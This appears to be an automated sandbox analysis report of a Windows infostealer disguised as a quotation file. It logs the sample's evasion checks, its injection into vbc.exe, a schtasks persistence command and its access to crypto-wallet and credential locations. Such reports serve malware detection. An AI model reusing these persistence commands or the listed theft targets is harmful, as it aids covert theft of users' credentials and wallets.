                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                        Source: C:\Users\user\Desktop\QUOTATION062022.exe TID: 6356Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5660Thread sleep time: -24903104499507879s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exe TID: 7064Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 6880Thread sleep time: -20291418481080494s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 6880Thread sleep time: -30000s >= -30000sJump to behavior
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeRegistry key enumerated: More than 298 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWindow / User API: threadDelayed 3998Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWindow / User API: threadDelayed 5494Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWindow / User API: threadDelayed 2684Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWindow / User API: threadDelayed 6326Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: vbc.exe, 00000017.00000003.475169463.000000000A96F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                        Source: vbc.exe, 00000017.00000003.475169463.000000000A96F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareSN1ZF_SBWin32_VideoController59WPYUURVideoController120060621000000.000000-00093755109display.infMSBDA_BSL2EWVPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsMZX6W1BN!
                        Source: vbc.exe, 00000017.00000003.474849036.00000000056D5000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.483489857.00000000056D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllT
                        Source: vbc.exe, 00000017.00000002.490764381.000000000A970000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareSN1ZF_SBWin32_VideoController59WPYUURVideoController120060621000000.000000-00093755109display.infMSBDA_BSL2EWVPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78>
                        Source: vbc.exe, 00000004.00000002.378025847.0000000005687000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareSN1ZF_SBWin32_VideoController59WPYUURVideoController120060621000000.000000-00093755109display.infMSBDA_BSL2EWVPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsMZX6W1BN
                        Source: vbc.exe, 00000004.00000002.378025847.0000000005687000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000Jump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 402000Jump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 41A000Jump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 41C000Jump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 5308008Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 402000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 41A000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 41C000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 53C3008Jump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /fJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C copy "C:\Users\user\Desktop\QUOTATION062022.exe" "C:\Users\user\AppData\Roaming\Data\Data.exeJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /fJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /fJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C copy "C:\Users\user\AppData\Roaming\Data\Data.exe" "C:\Users\user\AppData\Roaming\Data\Data.exeJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeQueries volume information: C:\Users\user\Desktop\QUOTATION062022.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeQueries volume information: C:\Users\user\AppData\Roaming\Data\Data.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Data\Data.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\QUOTATION062022.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 4.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.QUOTATION062022.exe.39e2f90.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.Data.exe.3acb170.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.Data.exe.3ae2f90.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.QUOTATION062022.exe.39cb170.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.QUOTATION062022.exe.39cb170.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.QUOTATION062022.exe.39e2f90.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.Data.exe.3ae2f90.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 23.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.Data.exe.3acb170.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.294290970.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.377531030.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000002.484490972.000000000731F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000000.280640029.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.379339995.00000000073DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000000.280345699.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000000.339858194.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000002.482951667.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000000.280075707.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000000.340545175.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000000.340235568.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.361910499.0000000003ACA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000000.340809810.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000000.279823172.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: QUOTATION062022.exe PID: 6328, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 6728, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Data.exe PID: 6952, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 408, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 6728, type: MEMORYSTR
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                        Source: QUOTATION062022.exe, 00000000.00000002.294290970.00000000039CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
                        Source: vbc.exe, 00000004.00000002.379649441.000000000753D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ok1C:\Users\user\AppData\Roaming\Electrum\wallets\*
